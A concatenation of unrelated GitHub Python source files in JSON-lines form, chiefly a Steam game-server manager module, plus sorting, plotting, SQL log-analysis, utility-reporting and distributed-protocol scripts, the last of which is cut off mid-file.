list(data['apps'][self.app_name]['servers'].keys())\n\n data = data['apps'][self.app_name]\n self.full_name = data['fname']\n\n if self.server_name:\n self.start_options = data['servers'][self.server_name]['start']\n self.stop_options = data['servers'][self.server_name]['stop']\n\n self.app_dir = Path(app_dir, str(self.app_id), self.app_name)\n if backup_dir:\n self.backup_dir = Path(backup_dir, str(self.app_id), self.app_name)\n\n self.beta, self.beta_password, self.app_config = None, None, None\n for key in data.keys():\n if key == 'beta':\n self.beta = data['beta']\n elif key == 'password':\n self.beta_password = data['password']\n elif key == 'app_config':\n self.app_config = data['app_config']\n\n if not platform:\n self.platform = pf.system()\n else:\n self.platform = platform\n\n self.platforms = data['platforms'].keys()\n self.arch = pf.architecture()[0]\n\n if self.platform in self.platforms:\n if 'exec' in data['platforms'][self.platform].keys():\n data = data['platforms'][self.platform]\n else:\n data = data['platforms'][self.platform][self.arch]\n\n self.exe = data['exec']\n self.exec_dir = self.app_dir\n self.library = None\n\n for key in data.keys():\n if key == 'directory':\n self.exec_dir = Path(self.app_dir, data['directory'])\n elif key == 'library':\n self.library = data['library']\n\n @property\n def build_id_local(self):\n '''Return the app's local build id'''\n f = Path(self.app_dir, 'steamapps', f'appmanifest_{self.app_id}.acf')\n\n if f.is_file():\n with open(f, 'r') as app_manifest:\n data = vdf.load(app_manifest)\n return int(data['AppState']['buildid'])\n return 0\n\n @property\n def build_id_steam(self):\n '''Return the app's steam build id'''\n steamcmd = SteamCMD()\n data = steamcmd.info(self.app_id)\n\n if data:\n if self.beta:\n return int(data['depots']['branches'][self.beta]['buildid'])\n return int(data['depots']['branches']['public']['buildid'])\n return 0\n\n @property\n def installed(self):\n '''Return True if app is installed'''\n if self.app_dir.exists():\n for d in self.app_dir.iterdir():\n # if only steamapps directory is found\n # then it did not completely install\n if d != 'steamapps':\n return True\n return False\n\n @property\n def running(self):\n '''Return True if app is running'''\n # Server functions do not work on Windows\n if self.platform != 'Windows':\n return Server.running_check(self.app_name)\n return False\n\n def backup(self, compression=None):\n '''Backup app to backup_dir using tar'''\n if not compression:\n compression = ''\n extension = '.tar'\n else:\n extension = f'.tar.{compression}'\n\n date = datetime.now().strftime(\"%Y-%m-%d-%H%M%S\")\n f = Path(self.backup_dir, f'{date}{extension}')\n\n with tarfile.open(f, f'w:{compression}') as tar:\n os.chdir(self.app_dir.parent)\n tar.add(self.app_name)\n\n def copy_config(self):\n '''Copy default app config file to config_dir'''\n f = f'{self.app_id}.yaml'\n shutil.copyfile(Path(Config.data_dir, 'apps', f),\n Path(Config.config_dir, 'apps', f))\n self.config_is_default = False\n\n def remove(self):\n '''Remove app directory'''\n shutil.rmtree(self.app_dir)\n\n # if this app is the only one installed for that app_id\n # remove the now empty app_id directory as well\n app_dir = self.app_dir.parent\n if not os.listdir(app_dir):\n app_dir.rmdir()\n\n def restore(self, backup):\n '''Restore specified backup file'''\n with tarfile.open(Path(self.backup_dir, backup)) as tar:\n def is_within_directory(directory, target):\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n tar.extractall(path, members, numeric_owner=numeric_owner) \n\n safe_extract(tar, self.app_dir.parent)\n\n if self.config_is_default:\n self.copy_config()\n\n def update(self, username='anonymous', password='',\n steam_guard='', validate=False):\n '''Update app using steamcmd'''\n if self.config_is_default:\n self.copy_config()\n\n steamcmd = SteamCMD()\n return steamcmd.app_update(self.app_id, self.app_dir,\n self.beta, self.beta_password,\n self.app_config, self.platform,\n validate, username, password,\n steam_guard)\n\n\nclass Index():\n '''Used for working with app_index.yaml'''\n f = Path(Config.config_dir, 'app_index.yaml')\n\n @staticmethod\n def config_dirs():\n '''Get app config dirs'''\n for d in Config.data_dir, Config.config_dir:\n d = Path(d, 'apps')\n if d.exists():\n yield d\n\n @staticmethod\n def list(directory):\n '''Return appid or app_name if not only app for app_id'''\n directory = Path(directory)\n if not directory.exists():\n return\n\n with open(Index.f, 'r') as f:\n data = yaml.safe_load(f)\n\n for app_id in directory.iterdir():\n if len(data[int(app_id.name)].keys()) > 1:\n for app_name in Path(directory, app_id).iterdir():\n yield app_name.name\n else:\n yield app_id.name\n\n @staticmethod\n def list_all():\n '''Return generator of all app_id's in index'''\n with open(Index.f, 'r') as f:\n data = yaml.safe_load(f)\n\n for app_id in data.keys():\n app_names = data[app_id].keys()\n\n if len(app_names) > 1:\n for app_name in app_names:\n yield app_name\n else:\n yield app_id\n\n @staticmethod\n def search(app):\n '''Search index for app and return app_id, app_name, and server_name'''\n try:\n app = int(app)\n except ValueError:\n pass\n\n with open(Index.f, 'r') as f:\n data = yaml.safe_load(f)\n\n if app in data.keys():\n return app, None, None\n\n for app_id in data.keys():\n if app in data[app_id].keys():\n if app in data[app_id][app]:\n return app_id, app, app\n return app_id, app, None\n for app_name in data[app_id].keys():\n if app in data[app_id][app_name]:\n return app_id, app_name, app\n return None, None, None\n\n @staticmethod\n def update():\n '''Update index with latst app config files'''\n app_index = {}\n for d in Index.config_dirs():\n for f in d.iterdir():\n if Path(f).suffix == '.yaml':\n with open(Path(d, f), 'r') as config_f:\n data = yaml.safe_load(config_f)\n\n for app in data['apps'].keys():\n app_index[data['app_id']] = {app: list(data['apps'][app]\n ['servers'].keys())}\n\n with open(Index.f, 'w') as f:\n yaml.dump(app_index, f)\n\n\nclass Server(App):\n def __init__(self, app, app_dir, backup_dir=None, platform=None):\n super(Server, self).__init__(app, app_dir, backup_dir, platform)\n if not self.server_name:\n self.server_name = self.server_names[0]\n\n self.tmux = libtmux.Server()\n self.session_name = f'{self.app_name}-{self.server_name}'\n\n try:\n self.session = self.tmux.sessions.filter(session_name=self.session_name)[0]\n except IndexError:\n self.session = None\n\n @property\n def running(self):\n '''Return True if app is running'''\n if self.server_name == self.app_name:\n return Server.running_check(self.app_name)\n return Server.running_check(self.app_name, self.server_name)\n\n def console(self):\n '''Attach to tmux session'''\n self.session.attach_session()\n\n def kill(self):\n '''Kill tmux session'''\n self.session.kill_session()\n\n @staticmethod\n def running_check(app_name, server_name=None):\n '''Check if server or app is running'''\n tmux = libtmux.Server()\n\n if server_name:\n try:\n session = tmux.sessions.filter(f'{app_name}-{server_name}')[0]\n if session:\n return True\n return False\n except IndexError:\n return False\n else:\n for session in tmux.sessions:\n if session.name.startswith(f'{app_name}-'):\n return True\n return False\n\n def send(self, command):\n '''Send command to tmux session'''\n pane = self.session.windows[0].panes[0]\n # suppress_history and literal must be false for c-c to work\n pane.send_keys(command, enter=True, suppress_history=False, literal=False)\n\n def start(self, debug=False):\n '''Start server'''\n if self.library:\n cmd = f'LD_LIBRARY_PATH={self.library} {self.exe} '\n else:\n cmd = f'{self.exe} '\n\n # unreal engine games have options that end with a ?\n # they have to be combined into 1 long string with no spaces\n if self.start_options and self.start_options[0].endswith('?'):\n cmd += ''.join(self.start_options)\n else:\n cmd += ' '.join(self.start_options)\n\n if debug:\n # tmux session stays open even if server exits\n self.session = self.tmux.new_session(session_name=self.session_name,\n start_directory=self.exec_dir)\n self.send(cmd)\n else:\n self.session = self.tmux.new_session(session_name=self.session_name,\n start_directory=self.exec_dir,\n window_command=cmd)\n\n def stop(self):\n '''Stop server'''\n if self.stop_options:\n for command in self.stop_options:\n self.send(command)\n else:\n # Send Ctrl - C to tmux session to stop server\n self.send('c-c')\n\n\nclass SteamCMD():\n def __init__(self):\n if shutil.which('steamcmd'):\n self.exe = 'steamcmd'\n else:\n if pf.system() != 'Windows':\n self.directory = Path('~/.local/share/scsm/steamcmd').expanduser()\n self.exe = Path(self.directory, 'steamcmd.sh')\n else:\n self.directory = Path(os.getenv('APPDATA'), 'scsm', 'steamcmd')\n self.exe = Path(self.directory, 'steamcmd.exe')\n\n @property\n def installed(self):\n '''Return True if installed'''\n if self.exe == 'steamcmd':\n return True\n return self.directory.exists() and self.exe.is_file()\n\n def app_update(self, app_id, app_dir, beta=None, beta_password=None,\n config=None, platform=None, validate=False,\n username='anonymous', password='', steam_guard='',):\n '''+app_update wrapper'''\n cmd = ['+force_install_dir', app_dir, '+login', username, password,\n steam_guard, '+app_update', str(app_id), '+quit']\n\n if config:\n cmd.insert(-3, f'+app_set_config {app_id} {config}')\n if beta:\n cmd.insert(-1, f'-beta {beta}')\n if beta_password:\n cmd.insert(-1, f'-betapassword {beta_password}')\n if validate:\n cmd.insert(-1, 'validate')\n\n if platform and platform != pf.system():\n if platform == 'Darwin':\n platform = 'macos'\n elif platform == 'Linux':\n platform = 'linux'\n elif platform == 'Windows':\n platform = 'windows'\n\n cmd.insert(1, f'+@sSteamCmdForcePlatformType {platform}')\n\n return self.run(cmd)\n\n def cached_login(self, username):\n '''Check if user has a cached login'''\n cmd = [self.exe, '+login', username, '+quit']\n proc = subprocess.run(cmd, stdout=subprocess.PIPE, stdin=subprocess.DEVNULL,\n timeout=5, shell=False)\n\n for line in proc.stdout.decode().split('\\n'):\n if 'Using cached credentials' in line:\n return True\n return False\n\n def info(self, app_id):\n ''''Return app info as dict'''\n cmd = [self.exe, '+login', 'anonymous', '+app_info_update', '1',\n '+app_info_print', str(app_id), '+quit']\n\n out = subprocess.run(cmd, stdout=subprocess.PIPE, shell=False).stdout.decode().split('\\n')\n start, end = 0, 0\n\n # find the start and end of the vdf file from output\n for i, line in enumerate(out):\n if not start and f'\"{app_id}\"' == line:\n start = i\n continue\n elif line == '}':\n end = i\n break\n\n data = '\\n'.join(out[start:end + 1])\n return vdf.loads(data)[str(app_id)]\n\n def install(self):\n '''Install steamcmd'''\n if pf.system() == 'Darwin':\n f = 'steamcmd_osx.tar.gz'\n elif pf.system() == 'Linux':\n f = 'steamcmd_linux.tar.gz'\n elif pf.system() == 'Windows':\n f = 'steamcmd.zip'\n\n base_url = 'https://steamcdn-a.akamaihd.net/client/installer'\n url = f'{base_url}/{f}'\n\n self.directory.mkdir(parents=True, exist_ok=True)\n urlretrieve(url, Path(self.directory, f))\n\n if pf.system() != 'Windows':\n with tarfile.open(Path(self.directory, f)) as tar:\n def is_within_directory(directory, target):\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n tar.extractall(path, members, numeric_owner=numeric_owner) \n\n safe_extract(tar, self.directory)\n else:\n with ZipFile(Path(self.directory, f)) as zipf:\n zipf.extractall(self.directory)\n\n def license(self, app_id, username='anonymous', password='', steam_guard=''):\n '''Check if user has a license for app_id'''\n cmd = [self.exe, '+login', username, password, steam_guard,\n '+licenses_for_app', str(app_id), '+quit']\n\n out = subprocess.run(cmd, stdout=subprocess.PIPE, shell=False).stdout.decode()\n\n for line in out.split('\\n'):\n if 'License packageID' in line:\n return True\n return False\n\n def remove(self):\n '''Remove steamcmd'''\n shutil.rmtree(self.directory)\n\n def run(self, args, username='anonymous', password='', steamguard=''):\n '''Run steamcmd with args and login'''\n args = [self.exe, username, password, steamguard] + args\n return subprocess.run(args, shell=False).returncode\n\n def update(self):\n '''Update steamcmd'''\n return self.run(['+quit'])\n","repo_name":"bubylou/scsm","sub_path":"scsm/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":17701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71810638313","text":"# Uses python3\nimport sys\nimport random\n\ndef partition3(a, l, r):\n x = a[l]\n j = l\n index = [l]\n for i in range(l + 1, r + 1):\n if a[i] < x:\n j += 1 \n a[i], a[j] = a[j], a[i]\n if a[i] == x:\n j += 1\n a[i], a[j] = a[j], a[i]\n index.append(j)\n for i in sorted(index, reverse = True):\n a.pop(i)\n count = len(index)\n for i in range(count):\n a.insert(j - count + 1, x)\n return j - count + 1, j\n\ndef partition2(a, l, r):\n x = a[l]\n j = l\n for i in range(l + 1, r + 1):\n if a[i] <= x:\n j += 1\n a[i], a[j] = a[j], a[i]\n a[l], a[j] = a[j], a[l]\n return j\n\n\ndef randomized_quick_sort(a, l, r):\n if l >= r:\n return\n k = random.randint(l, r)\n a[l], a[k] = a[k], a[l]\n m, n = partition3(a, l, r)\n randomized_quick_sort(a, l, m - 1);\n randomized_quick_sort(a, n + 1, r);\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n, *a = list(map(int, input.split()))\n randomized_quick_sort(a, 0, n - 1)\n for x in a:\n print(x, end=' ')\n","repo_name":"Leikvard/Algorithms","sub_path":"sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37473127516","text":"\nimport numpy as np\nfrom random import random\nfrom math import pi, cos, sin, sqrt\nimport matplotlib.pyplot as plt\n\nn_repeat = 10000\n\nxl = []\nyl = []\nfor r in np.linspace(0.001, 3., 100):\n xl.append(r)\n n_good = 0\n for i in range(n_repeat):\n x = random()\n y = random()\n theta = random() * 2*pi\n xx = x + r*cos(theta)\n yy = y + r*sin(theta)\n\n if not (xx > 0 and xx < 1. and yy > 0 and yy < 1.):\n n_good += 1\n yl.append(n_good / n_repeat)\n #yl2.append(min(sqrt(), 1.))\n\n\nplt.plot(xl, yl)\n#plt.plot(xl, yl2)\nplt.show()","repo_name":"GeremWD/raytracing-exp","sub_path":"src/jittered_slope_test.py","file_name":"jittered_slope_test.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28053742815","text":"# !/usr/bin/env python3\n# docstrings (the triple quotation mark method)\n\"\"\"\nThe first line in this file should be your shebang, which specifies\nwhich Python interpreter should be used to run your code .\nThe shebang tells the OS which interpreter to use when your script\nis run directly. For example, if you run `` .\n\"\"\"\n\n# importing DB-API module\nimport psycopg2\n\n# this function for printing result as a table style\n\n\ndef header_style(question, headr1, header2):\n print(\"\\n\\n\"+question+\"\\n\\n\"\n \"------------------------------------+--------------------\\n\"\n \"\\t \"+headr1+\"\\t | \"+header2+\" \\n\"\n \"------------------------------------+--------------------\")\n\n# this is connection function to connect with postgres DB\n\n\ndef conn():\n conn_db_obj = psycopg2.connect(database=\"news\")\n cursor = conn_db_obj.cursor()\n return conn_db_obj, cursor\n\n# the first question function implementation\n\n\ndef question_1():\n # connect with DB\n conn_db_obj, cursor = conn()\n # execute query\n cursor.execute(\"\"\"\n select count(*) as GetAccessTimes ,\n articles.title as ArtName\n from articles inner join log on log.path\n = '/article/' || articles.slug\n where log.status = '200 OK'\n group by ArtName\n order by GetAccessTimes desc limit 3\n \"\"\")\n # fetching all results from database\n results = cursor.fetchall()\n # close connection of database\n conn_db_obj.close()\n # printing the results in table\n header_style('1. What are the most popular three articles of all time?',\n 'Articles Name', 'Access Times')\n for GetAccessTimes, ArtName in results:\n print(\"%s | %d\" % (ArtName, GetAccessTimes))\n\n# the second question function implementation\n\n\ndef question_2():\n # connect with DB\n conn_db_obj, cursor = conn()\n # execute query\n cursor.execute(\"\"\"\n select authors.name as authName ,\n count(*) as GetAccessTimes\n from authors inner join articles\n on articles.author = authors.id\n inner join log on log.path\n like concat('%',articles.slug,'%')\n where log.status = '200 OK'\n group by authName\n order by GetAccessTimes desc\n \"\"\")\n # fetching all results from database\n results = cursor.fetchall()\n # close connection of database\n conn_db_obj.close()\n # printing the results in table\n header_style('2. Who are the most popular article authors of all time?',\n 'Author Name', 'Access Times')\n for authName, GetAccessTimes in results:\n print(\"%s \\t\\t | %d\" % (authName, GetAccessTimes))\n\n# the third question function implementation\n\n\ndef question_3():\n # connect with DB\n conn_db_obj, cursor = conn()\n # execute query\n cursor.execute(\"\"\"\n select * from (\n select date(log.time) as day ,\n 100.0 *\n sum(case log.status when '200 OK' then 0 else 1 end)\n /count(date(log.time)) as percentage from log\n group by day ) as virtualTable\n where percentage > 1\n \"\"\")\n # fetching all results from database\n results = cursor.fetchall()\n # close connection of database\n conn_db_obj.close()\n # printing the results in table\n header_style(\"3. On which days did \"\n \"more than 1% of requests lead to errors?\",\n 'Date of Day', 'Percentage')\n for day, percentage in results:\n print(\"%s\\t\\t\\t | %.1f %%\" % (day, percentage))\n\n\n# calling of all of the tree function to get the result\n\n\"\"\" To make sure the main subroutine is\nonly run when this program is executed directly,\nand not when it is imported as a module\"\"\"\nif __name__ == '__main__':\n question_1()\n question_2()\n question_3()\n","repo_name":"Eslam-Ayman/Logs-Analysis-DB","sub_path":"newsSourceCode.py","file_name":"newsSourceCode.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8617876985","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nduniteS2 = pd.read_fwf(\"duniteS2.rho_u.txt\", header=None, skiprows=2)\ndunite2 = pd.read_fwf(\"dunite2.rho_u.txt\", header=None, skiprows=2)\n\n\nduniteS2_densities = []\nduniteS2_minimum_energies = []\nduniteS2_negative_energies_densities = []\nduniteS2_negative_energies = []\nfor row in duniteS2.index:\n density = duniteS2[0][row]\n energy = duniteS2[1][row]\n if density not in duniteS2_densities:\n duniteS2_densities.append(density)\n duniteS2_minimum_energies.append(energy)\n if energy < 0.0:\n duniteS2_negative_energies_densities.append(density)\n duniteS2_negative_energies.append(energy)\n\ndunite2_densities = []\ndunite2_minimum_energies = []\ndunite2_negative_energies_densities = []\ndunite2_negative_energies = []\nfor row in dunite2.index:\n density = dunite2[0][row]\n energy = dunite2[1][row]\n if density not in dunite2_densities:\n dunite2_densities.append(density)\n dunite2_minimum_energies.append(energy)\n if energy < 0.0:\n dunite2_negative_energies_densities.append(density)\n dunite2_negative_energies.append(energy)\n\nax = plt.figure().add_subplot(111)\nax.plot(duniteS2_densities, duniteS2_minimum_energies, linewidth=2.0, color=\"blue\", label=\"DuniteS2\")\nax.plot(dunite2_densities, dunite2_minimum_energies, linewidth=2.0, color=\"red\", label=\"Dunite2\")\nax.set_xlabel(\"Density\")\nax.set_ylabel(\"Minimum Energy\")\nax.set_title(\"Density vs. Minimum Energy in Interpolation Files\")\nax.legend()\nax.grid()\n\nax2 = plt.figure().add_subplot(111)\nax2.scatter(duniteS2_negative_energies_densities, duniteS2_negative_energies, linewidth=2.0, color=\"blue\", label=\"DuniteS2\")\nax2.scatter(dunite2_negative_energies_densities, dunite2_negative_energies, linewidth=2.0, color=\"red\", label=\"Dunite2\")\nax2.set_xlabel(\"Density\")\nax2.set_ylabel(\"Negative Energy\")\nax2.set_title(\"Density vs. Negative Energy in Interpolation Files\")\nax2.legend()\nax2.grid()\n\nplt.show()\n\n\n\n","repo_name":"ScottHull/bilinear-interpolation","sub_path":"plot_all_interplation_files.py","file_name":"plot_all_interplation_files.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72340726632","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nimport traceback\nfrom libcnmc.utils import format_f\nfrom libcnmc.core import StopMultiprocessBased\n\n\nclass F13bis(StopMultiprocessBased):\n def __init__(self, **kwargs):\n super(F13bis, self).__init__(**kwargs)\n self.year = kwargs.pop('year', datetime.now().year - 1)\n self.report_name = 'F13 bis - PARCS'\n self.base_object = 'PARCS'\n\n def get_sequence(self):\n # Revisem que estigui actiu\n search_params = [('active', '!=', False)]\n return self.connection.GiscedataParcs.search(\n search_params, 0, 0, False, {'active_test': False})\n\n def get_subestacio(self, sub_id):\n \"\"\"\n Returns the SE data\n :param sub_id: ID of SE\n :type sub_id: int\n :return: Node, Name, CINI and CT-ID of the SE\n :rtype: dict[str,str]\n \"\"\"\n\n o = self.connection\n sub = o.GiscedataCtsSubestacions.read(\n sub_id, ['ct_id', 'cini', 'name', 'node_id']\n )\n ret = {\n \"ct_id\": sub['ct_id'][0],\n \"cini\": sub['cini'],\n \"name\": sub['name']\n }\n if 'node_id' in sub:\n ret[\"node\"] = sub[\"node_id\"][1]\n else:\n bloc_ids = o.GiscegisBlocsCtat.search([('ct', '=', ret[\"ct_id\"])])\n node = ''\n if bloc_ids:\n bloc = o.GiscegisBlocsCtat.read(bloc_ids[0], ['node'])\n node = bloc['node'][1]\n ret[\"node\"] = node\n return ret\n\n def get_tensio(self, parc_id):\n o = self.connection\n tensio_id = o.GiscedataParcs.read(\n parc_id, ['tensio_id'])['tensio_id'][0]\n return o.GiscedataTensionsTensio.read(tensio_id, ['tensio'])['tensio']\n\n def consumer(self):\n o = self.connection\n fields_to_read = [\n 'id', 'subestacio_id', 'name', 'tipus', 'propietari', 'cini'\n ]\n while True:\n try:\n # generar linies\n item = self.input_q.get()\n if item == \"STOP\":\n self.input_q.task_done()\n break\n self.progress_q.put(item)\n parc = o.GiscedataParcs.read(\n item, fields_to_read\n )\n subestacio = self.get_subestacio(parc['subestacio_id'][0])\n o_subestacio = subestacio['name']\n o_parc = parc['name']\n o_node = subestacio['node']\n o_node = o_node.replace('*', '')\n o_cini = parc['cini']\n o_tipus = parc['tipus'] - 1\n tensio = self.get_tensio(parc['id'])\n o_tensio = format_f(\n float(tensio) / 1000.0, decimals=3)\n o_prop = int(parc['propietari'])\n o_any = self.year\n insert = True\n if insert:\n self.output_q.put([\n o_subestacio, # SUBESTACION\n o_parc, # PARQUE\n o_node, # NUDO\n o_cini, # CINI\n o_tipus, # TIPO PARQUE\n o_tensio, # TENSION DEL PARQUE\n o_prop, # PROPIEDAD\n o_any # AÑO INFORMACION\n ])\n self.input_q.task_done()\n except Exception as e:\n self.input_q.task_done()\n traceback.print_exc()\n if self.raven:\n self.raven.captureException()\n","repo_name":"gisce/libCNMC","sub_path":"libcnmc/cir_4_2015/F13bis.py","file_name":"F13bis.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"73563958632","text":"import sys,os\nimport time\nimport hashlib,random\nfrom node import Node\n# sys.path.insert(0, '..') # Import the files where the modules are located\nimport newjson as json,threading,multiprocessing\nfrom multiprocessing import Process, Manager \nimport zlib, bz2, lzma, base64\n\n\nfrom config import config\n\nID = sys.argv[1]\n\nn=len(config[\"nodes\"])\nf=int((len(config[\"nodes\"]) -1)/3)\n \nip = config[\"nodes\"][ID][\"ip\"]\nport = config[\"portBase\"] + int(ID)\nC_Plen = config[\"C_Plen\"]\nCTs = None\n\n\n\ndef callback(event, mynode, yournode, data):\n global CTs\n if event == \"node_message\": \n # print(data.length)\n tp = data['type']\n rv = json.loads(data['v'])\n epoch = rv['epoch'] \n seq = rv['seq']\n yourid = yournode.id\n # print(\"node:%s recieve type:%s from node:%s\"%(mynode.id, tp, yournode.id), seq, epoch)\n sentProducer = \"sent_%s_%s\"%(tp, seq)\n sentConsumer = \"sent_%s_%s\"%(tp, epoch)\n \n \n\n for tpi in [\"pks\", \"initial\",\"echo\", \"ready\"]:\n \n if tpi not in mynode.msgs:\n mynode.msgs[tpi]={} \n\n if seq not in mynode.msgs[tpi]:\n mynode.msgs[tpi][seq] = {} \n \n if sentProducer not in mynode.msgs:\n mynode.msgs[sentProducer] = False\n\n seqStart = int(seq.split(\"seq_\")[1]) \n\n if tp in [\"pks\", \"initial\",\"echo\", \"ready\"]: \n if tp!=\"pks\":\n mynode.producerRecvSize+=len(str(base64.b64encode(zlib.compress(str(data).encode('utf-8'), 6) + b'zlib'))) \n\n leaderID = seq.split(\"ld_\")[1].split(\"seq_\")[0]\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i ) \n if seqistr not in mynode.msgs[tp]:\n mynode.msgs[tp][seqistr]={}\n\n if tp in [\"recon\", \"reconEcho\", \"reconReady\"]:\n mynode.consumerRecvSize+=len(str(base64.b64encode(zlib.compress(str(data).encode('utf-8'), 6) + b'zlib'))) \n print(tp, len(str(base64.b64encode(zlib.compress(str(data).encode('utf-8'), 6) + b'zlib'))) )\n\n for tpi in [\"recon\", \"reconEcho\", \"reconReady\"]:\n if tpi not in mynode.cis:\n mynode.cis[tpi]={}\n if epoch not in mynode.cis[tpi]:\n mynode.cis[tpi][epoch]={}\n\n if sentConsumer not in mynode.cis:\n mynode.cis[sentConsumer] = False\n\n \n if tp == \"pks\":\n mynode.pvss.setPK(int(yourid), rv['pk'])\n # print(\"node:%s's pks length:%d\"%(mynode.id, len(mynode.pvss.pks)))\n if len(mynode.pvss.pks) == len(config['nodes']): \n time.sleep(10)\n print(\"Node %s producer starts\"%(mynode.id)) \n \n # sv={'C_P': json.loads(json.dumps(mynode.pvss.share(n,f+1)))}\n sv={'C_Ps': [json.loads(json.dumps(mynode.pvss.share(n,f+1))) for i in range(0, C_Plen)]}\n sv['epoch'] = epoch\n sv['ts'] = time.time()\n sv['ts1'] = time.time() \n sv['seq'] = \"ld_%sseq_%d\"%(mynode.id,mynode.seq) \n # mynode.msgs[sentProducer] = True\n hC_Ps = mynode.pvss.hash(sv['C_Ps']) \n for i in range(0, C_Plen):\n seqi = mynode.seq+i \n seqistr = 'ld_%sseq_%d'%(mynode.id,seqi)\n if seqistr not in mynode.msgs[\"initial\"]:\n mynode.msgs[\"initial\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"initial\"][seqistr]:\n mynode.msgs[\"initial\"][seqistr][mynode.id]=sv['C_Ps'][i]\n if seqistr not in mynode.msgs[\"echo\"]:\n mynode.msgs[\"echo\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"echo\"][seqistr]:\n mynode.msgs[\"echo\"][seqistr][mynode.id]=hC_Ps\n\n mynode.seq += C_Plen\n \n mynode.send_to_nodes({\"type\": \"initial\", \"v\": json.dumps(sv)}) \n\n sv['hC_Ps'] = hC_Ps\n del sv['C_Ps']\n mynode.send_to_nodes({\"type\": \"echo\", \"v\": json.dumps(sv)}) \n elif tp == \"initial\":\n \n seqStart = int(seq.split(\"seq_\")[1])\n seqistr=seq\n for i in range(0, C_Plen):\n seqi = seqStart + i \n seqistr = 'ld_%sseq_%d'%(leaderID, seqi)\n mynode.msgs[tp][seqistr][yourid] = rv['C_Ps'][i]\n mynode.pvss.verify(rv['C_Ps'][i][\"C\"], rv['C_Ps'][i][\"proof_sw\"])\n sv = {\"hC_Ps\":mynode.pvss.hash(rv['C_Ps'])} \n sv['epoch'] = epoch\n sv['seq'] = seq \n sv['ts'] = rv['ts']\n sv['ts1'] = time.time()\n seqStart = int(seq.split(\"seq_\")[1])\n # time.sleep(0.2)\n if mynode.sendingCnt > 0:\n time.sleep(mynode.sendingCnt / 500.)\n\n for i in range(0, C_Plen):\n seqi = seqStart + i \n seqistr = 'ld_%sseq_%d'%(leaderID,seqi)\n if seqistr not in mynode.msgs[\"echo\"]:\n mynode.msgs[\"echo\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"echo\"][seqistr]:\n mynode.msgs[\"echo\"][seqistr][mynode.id]=sv['hC_Ps']\n # mynode.msgs[tp][seqistr][yourid] = rv['C_Ps'][i]\n # print(\"%s echo ct= %s at %s\"%(mynode.id, sv['hC_Ps'], sv['seq']), len(mynode.msgs[\"echo\"][seqistr]))\n mynode.send_to_nodes({\"type\": \"echo\", \"v\": json.dumps(sv)}) \n elif tp == \"echo\":\n \n seqStart = int(seq.split(\"seq_\")[1])\n seqistr=seq\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i )\n mynode.msgs[tp][seqistr][yourid] = rv['hC_Ps']\n sv = {\"hC_Ps\":rv['hC_Ps']}\n sv['epoch'] = epoch\n sv['seq'] = seq \n sv['ts'] = rv['ts']\n sv['ts1'] = rv['ts1']\n \n # print(mynode.id, \"recieve echo from\",yourid, seq, rv['hC_Ps'],len(mynode.msgs[\"echo\"][seq]))\n if len(mynode.msgs[\"echo\"][seqistr]) > 2*f or (seqistr in mynode.msgs[\"ready\"] and len(mynode.msgs[\"ready\"][seqistr]) > f): \n if not mynode.msgs[sentProducer]:\n mynode.msgs[sentProducer] = True\n else:\n return \n sv['ts2'] = time.time() \n # time.sleep(0.2) \n if mynode.sendingCnt > 0: \n time.sleep(mynode.sendingCnt / 500) \n \n \n seqStart = int(seq.split(\"seq_\")[1])\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID,seqStart + i )\n if seqistr not in mynode.msgs[\"ready\"]:\n mynode.msgs[\"ready\"][seqistr]={}\n if mynode.id not in mynode.msgs[\"ready\"][seqistr]:\n mynode.msgs[\"ready\"][seqistr][mynode.id]=sv['hC_Ps']\n # print(\"node %s send ready ct: %s\"%(mynode.id, sv['hC_Ps']))\n mynode.send_to_nodes({\"type\": \"ready\", \"v\": json.dumps(sv)}) \n\n elif tp == \"ready\":\n \n # mynode.msgs[tp][seq][yourid] = rv['hC_Ps']\n seqStart = int(seq.split(\"seq_\")[1])\n seqistr=seq\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i )\n mynode.msgs[tp][seqistr][yourid] = rv['hC_Ps']\n\n if len(mynode.msgs[\"ready\"][seqistr]) > 2*f:\n \n if not mynode.msgs[sentProducer]:\n mynode.msgs[sentProducer] = True\n for i in range(0, C_Plen):\n seqistr = 'ld_%sseq_%d'%(leaderID, seqStart + i )\n sentProducer = 'sent_%s_%s'%(tp, seqistr)\n mynode.msgs[sentProducer] = True\n else:\n return\n\n ts = 